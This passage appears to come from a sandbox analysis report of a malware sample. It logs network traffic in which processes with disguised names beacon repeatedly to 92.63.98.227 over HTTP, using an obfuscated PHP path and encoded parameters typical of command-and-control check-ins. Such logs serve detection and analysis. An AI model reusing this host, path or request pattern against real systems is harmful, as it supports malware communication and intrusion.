            Aug 28, 2024 15:33:11.924556017 CEST805187292.63.98.227192.168.2.6
            Aug 28, 2024 15:33:12.521725893 CEST805187292.63.98.227192.168.2.6
            Aug 28, 2024 15:33:12.521816015 CEST5187280192.168.2.692.63.98.227
            Aug 28, 2024 15:33:12.521903992 CEST5187280192.168.2.692.63.98.227
            Aug 28, 2024 15:33:12.524056911 CEST5187380192.168.2.692.63.98.227
            Aug 28, 2024 15:33:12.526670933 CEST805187292.63.98.227192.168.2.6
            Aug 28, 2024 15:33:12.528970957 CEST805187392.63.98.227192.168.2.6
            Aug 28, 2024 15:33:12.529052973 CEST5187380192.168.2.692.63.98.227
            Aug 28, 2024 15:33:12.529107094 CEST5187380192.168.2.692.63.98.227
            Aug 28, 2024 15:33:12.533914089 CEST805187392.63.98.227192.168.2.6
            Aug 28, 2024 15:33:13.321707964 CEST805187392.63.98.227192.168.2.6
            Aug 28, 2024 15:33:13.321787119 CEST5187380192.168.2.692.63.98.227
            Aug 28, 2024 15:33:13.321882010 CEST5187380192.168.2.692.63.98.227
            Aug 28, 2024 15:33:13.322201967 CEST5187480192.168.2.692.63.98.227
            Aug 28, 2024 15:33:13.328119993 CEST805187392.63.98.227192.168.2.6
            Aug 28, 2024 15:33:13.328131914 CEST805187492.63.98.227192.168.2.6
            Aug 28, 2024 15:33:13.328191996 CEST5187480192.168.2.692.63.98.227
            Aug 28, 2024 15:33:13.328346968 CEST5187480192.168.2.692.63.98.227
            Aug 28, 2024 15:33:13.338038921 CEST805187492.63.98.227192.168.2.6
            Aug 28, 2024 15:33:13.921120882 CEST805187492.63.98.227192.168.2.6
            Aug 28, 2024 15:33:13.921189070 CEST5187480192.168.2.692.63.98.227
            Aug 28, 2024 15:33:13.921281099 CEST5187480192.168.2.692.63.98.227
            Aug 28, 2024 15:33:13.926613092 CEST805187492.63.98.227192.168.2.6
            Aug 28, 2024 15:33:22.365149021 CEST5187580192.168.2.692.63.98.227
            Aug 28, 2024 15:33:22.377100945 CEST805187592.63.98.227192.168.2.6
            Aug 28, 2024 15:33:22.377192974 CEST5187580192.168.2.692.63.98.227
            Aug 28, 2024 15:33:22.377326012 CEST5187580192.168.2.692.63.98.227
            Aug 28, 2024 15:33:22.382606030 CEST805187592.63.98.227192.168.2.6
            Aug 28, 2024 15:33:22.963675022 CEST805187592.63.98.227192.168.2.6
            Aug 28, 2024 15:33:22.963795900 CEST5187580192.168.2.692.63.98.227
            Aug 28, 2024 15:33:22.965699911 CEST5187580192.168.2.692.63.98.227
            Aug 28, 2024 15:33:22.966355085 CEST5187680192.168.2.692.63.98.227
            Aug 28, 2024 15:33:22.970535994 CEST805187592.63.98.227192.168.2.6
            Aug 28, 2024 15:33:22.971155882 CEST805187692.63.98.227192.168.2.6
            Aug 28, 2024 15:33:22.971241951 CEST5187680192.168.2.692.63.98.227
            Aug 28, 2024 15:33:22.971332073 CEST5187680192.168.2.692.63.98.227
            Aug 28, 2024 15:33:22.976176023 CEST805187692.63.98.227192.168.2.6
            Aug 28, 2024 15:33:23.579605103 CEST805187692.63.98.227192.168.2.6
            Aug 28, 2024 15:33:23.579695940 CEST5187680192.168.2.692.63.98.227
            Aug 28, 2024 15:33:23.579792976 CEST5187680192.168.2.692.63.98.227
            Aug 28, 2024 15:33:23.583153963 CEST5187780192.168.2.692.63.98.227
            Aug 28, 2024 15:33:23.584676981 CEST805187692.63.98.227192.168.2.6
            Aug 28, 2024 15:33:23.588099003 CEST805187792.63.98.227192.168.2.6
            Aug 28, 2024 15:33:23.588184118 CEST5187780192.168.2.692.63.98.227
            Aug 28, 2024 15:33:23.591308117 CEST5187780192.168.2.692.63.98.227
            Aug 28, 2024 15:33:23.597675085 CEST805187792.63.98.227192.168.2.6
            Aug 28, 2024 15:33:24.207647085 CEST805187792.63.98.227192.168.2.6
            Aug 28, 2024 15:33:24.207737923 CEST5187780192.168.2.692.63.98.227
            Aug 28, 2024 15:33:24.207822084 CEST5187780192.168.2.692.63.98.227
            Aug 28, 2024 15:33:24.208112001 CEST5187880192.168.2.692.63.98.227
            Aug 28, 2024 15:33:24.212694883 CEST805187792.63.98.227192.168.2.6
            Aug 28, 2024 15:33:24.212928057 CEST805187892.63.98.227192.168.2.6
            Aug 28, 2024 15:33:24.213009119 CEST5187880192.168.2.692.63.98.227
            Aug 28, 2024 15:33:24.213080883 CEST5187880192.168.2.692.63.98.227
            Aug 28, 2024 15:33:24.217916965 CEST805187892.63.98.227192.168.2.6
            Aug 28, 2024 15:33:24.812983036 CEST805187892.63.98.227192.168.2.6
            Aug 28, 2024 15:33:24.813154936 CEST5187880192.168.2.692.63.98.227
            Aug 28, 2024 15:33:24.813226938 CEST5187880192.168.2.692.63.98.227
            Aug 28, 2024 15:33:24.817987919 CEST805187892.63.98.227192.168.2.6
            Aug 28, 2024 15:33:35.147124052 CEST5188180192.168.2.692.63.98.227
            Aug 28, 2024 15:33:35.152650118 CEST805188192.63.98.227192.168.2.6
            Aug 28, 2024 15:33:35.152738094 CEST5188180192.168.2.692.63.98.227
            Aug 28, 2024 15:33:35.152940035 CEST5188180192.168.2.692.63.98.227
            Aug 28, 2024 15:33:35.157948971 CEST805188192.63.98.227192.168.2.6
            Aug 28, 2024 15:33:35.764250040 CEST805188192.63.98.227192.168.2.6
            Aug 28, 2024 15:33:35.764312029 CEST5188180192.168.2.692.63.98.227
            Aug 28, 2024 15:33:35.766316891 CEST5188180192.168.2.692.63.98.227
            Aug 28, 2024 15:33:35.766999960 CEST5188280192.168.2.692.63.98.227
            Aug 28, 2024 15:33:35.771117926 CEST805188192.63.98.227192.168.2.6
            Aug 28, 2024 15:33:35.771754026 CEST805188292.63.98.227192.168.2.6
            Aug 28, 2024 15:33:35.771816969 CEST5188280192.168.2.692.63.98.227
            Aug 28, 2024 15:33:35.771965981 CEST5188280192.168.2.692.63.98.227
            Aug 28, 2024 15:33:35.776727915 CEST805188292.63.98.227192.168.2.6
            Aug 28, 2024 15:33:36.379072905 CEST805188292.63.98.227192.168.2.6
            Aug 28, 2024 15:33:36.379420042 CEST5188280192.168.2.692.63.98.227
            Aug 28, 2024 15:33:36.379465103 CEST5188280192.168.2.692.63.98.227
            Aug 28, 2024 15:33:36.381973982 CEST5188380192.168.2.692.63.98.227
            Aug 28, 2024 15:33:36.384301901 CEST805188292.63.98.227192.168.2.6
            Aug 28, 2024 15:33:36.386862040 CEST805188392.63.98.227192.168.2.6
            Aug 28, 2024 15:33:36.386929035 CEST5188380192.168.2.692.63.98.227
            Aug 28, 2024 15:33:36.386970997 CEST5188380192.168.2.692.63.98.227
            Aug 28, 2024 15:33:36.391758919 CEST805188392.63.98.227192.168.2.6
            Aug 28, 2024 15:33:36.982460022 CEST805188392.63.98.227192.168.2.6
            Aug 28, 2024 15:33:36.984644890 CEST5188380192.168.2.692.63.98.227
            Aug 28, 2024 15:33:36.984939098 CEST5188380192.168.2.692.63.98.227
            Aug 28, 2024 15:33:36.984939098 CEST5188480192.168.2.692.63.98.227
            Aug 28, 2024 15:33:36.989764929 CEST805188392.63.98.227192.168.2.6
            Aug 28, 2024 15:33:36.989777088 CEST805188492.63.98.227192.168.2.6
            Aug 28, 2024 15:33:36.989859104 CEST5188480192.168.2.692.63.98.227
            Aug 28, 2024 15:33:36.989923000 CEST5188480192.168.2.692.63.98.227
            Aug 28, 2024 15:33:36.994739056 CEST805188492.63.98.227192.168.2.6
            Aug 28, 2024 15:33:37.591340065 CEST805188492.63.98.227192.168.2.6
            Aug 28, 2024 15:33:37.591556072 CEST5188480192.168.2.692.63.98.227
            Aug 28, 2024 15:33:37.594690084 CEST5188480192.168.2.692.63.98.227
            Aug 28, 2024 15:33:37.599438906 CEST805188492.63.98.227192.168.2.6
            Aug 28, 2024 15:33:41.554570913 CEST5188580192.168.2.692.63.98.227
            Aug 28, 2024 15:33:41.559531927 CEST805188592.63.98.227192.168.2.6
            Aug 28, 2024 15:33:41.559619904 CEST5188580192.168.2.692.63.98.227
            Aug 28, 2024 15:33:41.559803963 CEST5188580192.168.2.692.63.98.227
            Aug 28, 2024 15:33:41.564646959 CEST805188592.63.98.227192.168.2.6
            Aug 28, 2024 15:33:42.153708935 CEST805188592.63.98.227192.168.2.6
            Aug 28, 2024 15:33:42.156568050 CEST5188580192.168.2.692.63.98.227
            Aug 28, 2024 15:33:42.158231020 CEST5188580192.168.2.692.63.98.227
            Aug 28, 2024 15:33:42.158896923 CEST5188680192.168.2.692.63.98.227
            Aug 28, 2024 15:33:42.163768053 CEST805188592.63.98.227192.168.2.6
            Aug 28, 2024 15:33:42.164040089 CEST805188692.63.98.227192.168.2.6
            Aug 28, 2024 15:33:42.164132118 CEST5188680192.168.2.692.63.98.227
            Aug 28, 2024 15:33:42.164207935 CEST5188680192.168.2.692.63.98.227
            Aug 28, 2024 15:33:42.169430017 CEST805188692.63.98.227192.168.2.6
            Aug 28, 2024 15:33:42.765005112 CEST805188692.63.98.227192.168.2.6
            Aug 28, 2024 15:33:42.765235901 CEST5188680192.168.2.692.63.98.227
            Aug 28, 2024 15:33:42.788655996 CEST5188680192.168.2.692.63.98.227
            Aug 28, 2024 15:33:42.790832043 CEST5188780192.168.2.692.63.98.227
            Aug 28, 2024 15:33:42.793565035 CEST805188692.63.98.227192.168.2.6
            Aug 28, 2024 15:33:42.795722961 CEST805188792.63.98.227192.168.2.6
            Aug 28, 2024 15:33:42.795818090 CEST5188780192.168.2.692.63.98.227
            Aug 28, 2024 15:33:42.796940088 CEST5188780192.168.2.692.63.98.227
            Aug 28, 2024 15:33:42.802097082 CEST805188792.63.98.227192.168.2.6
            Aug 28, 2024 15:33:43.410598040 CEST805188792.63.98.227192.168.2.6
            Aug 28, 2024 15:33:43.410774946 CEST5188780192.168.2.692.63.98.227
            Aug 28, 2024 15:33:43.411072016 CEST5188780192.168.2.692.63.98.227
            Aug 28, 2024 15:33:43.411077976 CEST5188880192.168.2.692.63.98.227
            Aug 28, 2024 15:33:43.416070938 CEST805188792.63.98.227192.168.2.6
            Aug 28, 2024 15:33:43.416088104 CEST805188892.63.98.227192.168.2.6
            Aug 28, 2024 15:33:43.416171074 CEST5188880192.168.2.692.63.98.227
            Aug 28, 2024 15:33:43.416255951 CEST5188880192.168.2.692.63.98.227
            Aug 28, 2024 15:33:43.421422958 CEST805188892.63.98.227192.168.2.6
            Aug 28, 2024 15:33:44.007049084 CEST805188892.63.98.227192.168.2.6
            Aug 28, 2024 15:33:44.007271051 CEST5188880192.168.2.692.63.98.227
            Aug 28, 2024 15:33:44.007325888 CEST5188880192.168.2.692.63.98.227
            Aug 28, 2024 15:33:44.012171984 CEST805188892.63.98.227192.168.2.6
            Aug 28, 2024 15:33:57.929131031 CEST5188980192.168.2.692.63.98.227
            Aug 28, 2024 15:33:57.934189081 CEST805188992.63.98.227192.168.2.6
            Aug 28, 2024 15:33:57.934288979 CEST5188980192.168.2.692.63.98.227
            Aug 28, 2024 15:33:57.934411049 CEST5188980192.168.2.692.63.98.227
            Aug 28, 2024 15:33:57.939261913 CEST805188992.63.98.227192.168.2.6
            Aug 28, 2024 15:33:58.527602911 CEST805188992.63.98.227192.168.2.6
            Aug 28, 2024 15:33:58.527865887 CEST5188980192.168.2.692.63.98.227
            Aug 28, 2024 15:33:58.529581070 CEST5188980192.168.2.692.63.98.227
            Aug 28, 2024 15:33:58.534431934 CEST805188992.63.98.227192.168.2.6
            Aug 28, 2024 15:33:58.581911087 CEST5189080192.168.2.692.63.98.227
            Aug 28, 2024 15:33:58.586935997 CEST805189092.63.98.227192.168.2.6
            Aug 28, 2024 15:33:58.587019920 CEST5189080192.168.2.692.63.98.227
            Aug 28, 2024 15:33:58.587141037 CEST5189080192.168.2.692.63.98.227
            Aug 28, 2024 15:33:58.591903925 CEST805189092.63.98.227192.168.2.6
            Aug 28, 2024 15:33:59.191356897 CEST805189092.63.98.227192.168.2.6
            Aug 28, 2024 15:33:59.191452980 CEST5189080192.168.2.692.63.98.227
            Aug 28, 2024 15:33:59.191539049 CEST5189080192.168.2.692.63.98.227
            Aug 28, 2024 15:33:59.193588018 CEST5189180192.168.2.692.63.98.227
            Aug 28, 2024 15:33:59.196368933 CEST805189092.63.98.227192.168.2.6
            Aug 28, 2024 15:33:59.198497057 CEST805189192.63.98.227192.168.2.6
            Aug 28, 2024 15:33:59.198590994 CEST5189180192.168.2.692.63.98.227
            Aug 28, 2024 15:33:59.198673964 CEST5189180192.168.2.692.63.98.227
            Aug 28, 2024 15:33:59.203918934 CEST805189192.63.98.227192.168.2.6
            Aug 28, 2024 15:33:59.787250996 CEST805189192.63.98.227192.168.2.6
            Aug 28, 2024 15:33:59.790381908 CEST5189180192.168.2.692.63.98.227
            Aug 28, 2024 15:33:59.790524006 CEST5189180192.168.2.692.63.98.227
            Aug 28, 2024 15:33:59.790947914 CEST5189280192.168.2.692.63.98.227
            Aug 28, 2024 15:33:59.795351982 CEST805189192.63.98.227192.168.2.6
            Aug 28, 2024 15:33:59.795861959 CEST805189292.63.98.227192.168.2.6
            Aug 28, 2024 15:33:59.795969009 CEST5189280192.168.2.692.63.98.227
            Aug 28, 2024 15:33:59.796047926 CEST5189280192.168.2.692.63.98.227
            Aug 28, 2024 15:33:59.800820112 CEST805189292.63.98.227192.168.2.6
            Aug 28, 2024 15:34:00.390815020 CEST805189292.63.98.227192.168.2.6
            Aug 28, 2024 15:34:00.390952110 CEST5189280192.168.2.692.63.98.227
            Aug 28, 2024 15:34:00.391047955 CEST5189280192.168.2.692.63.98.227
            Aug 28, 2024 15:34:00.395811081 CEST805189292.63.98.227192.168.2.6
            Timestamp | Source Port | Dest Port | Source IP | Dest IP
            Aug 28, 2024 15:32:40.587914944 CEST | 53 | 54615 | 162.159.36.2 | 192.168.2.6
            Aug 28, 2024 15:32:41.284053087 CEST | 53 | 60169 | 1.1.1.1 | 192.168.2.6
            • 92.63.98.227
            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            0 | 192.168.2.6 | 49716 | 92.63.98.227 | 80 | 1212 | C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 28, 2024 15:32:19.258656979 CEST | 731 | OUT | GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G HTTP/1.1
            Accept: */*
            Content-Type: text/html
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            1 | 192.168.2.6 | 49717 | 92.63.98.227 | 80 | 1212 | C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 28, 2024 15:32:19.876547098 CEST | 731 | OUT | GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G HTTP/1.1
            Accept: */*
            Content-Type: text/html
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            2 | 192.168.2.6 | 49718 | 92.63.98.227 | 80 | 1212 | C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 28, 2024 15:32:20.496839046 CEST | 731 | OUT | GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G HTTP/1.1
            Accept: */*
            Content-Type: text/html
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            3 | 192.168.2.6 | 49719 | 92.63.98.227 | 80 | 1212 | C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 28, 2024 15:32:21.104700089 CEST | 731 | OUT | GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G HTTP/1.1
            Accept: */*
            Content-Type: text/html
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            4 | 192.168.2.6 | 49721 | 92.63.98.227 | 80 | 6320 | C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 28, 2024 15:32:29.113605022 CEST | 702 | OUT | GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA HTTP/1.1
            Accept: */*
            Content-Type: text/css
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            5 | 192.168.2.6 | 49722 | 92.63.98.227 | 80 | 6320 | C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 28, 2024 15:32:29.723524094 CEST702OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA HTTP/1.1
            Accept: */*
            Content-Type: text/css
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            6 | 192.168.2.6 | 49723 | 92.63.98.227 | 80 | 6320 | C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 28, 2024 15:32:30.347129107 CEST702OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA HTTP/1.1
            Accept: */*
            Content-Type: text/css
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            7 | 192.168.2.6 | 49724 | 92.63.98.227 | 80 | 6320 | C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 28, 2024 15:32:30.967681885 CEST702OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA HTTP/1.1
            Accept: */*
            Content-Type: text/css
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            8 | 192.168.2.6 | 49725 | 92.63.98.227 | 80 | 5764 | C:\Program Files (x86)\Microsoft.NET\System.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 28, 2024 15:32:35.301584005 CEST793OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT HTTP/1.1
            Accept: */*
            Content-Type: text/javascript
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            9 | 192.168.2.6 | 49726 | 92.63.98.227 | 80 | 5764 | C:\Program Files (x86)\Microsoft.NET\System.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 28, 2024 15:32:35.902563095 CEST793OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT HTTP/1.1
            Accept: */*
            Content-Type: text/javascript
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            10 | 192.168.2.6 | 49727 | 92.63.98.227 | 80 | 5764 | C:\Program Files (x86)\Microsoft.NET\System.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 28, 2024 15:32:36.526133060 CEST793OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT HTTP/1.1
            Accept: */*
            Content-Type: text/javascript
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            11 | 192.168.2.6 | 49728 | 92.63.98.227 | 80 | 5764 | C:\Program Files (x86)\Microsoft.NET\System.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 28, 2024 15:32:37.133161068 CEST793OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT HTTP/1.1
            Accept: */*
            Content-Type: text/javascript
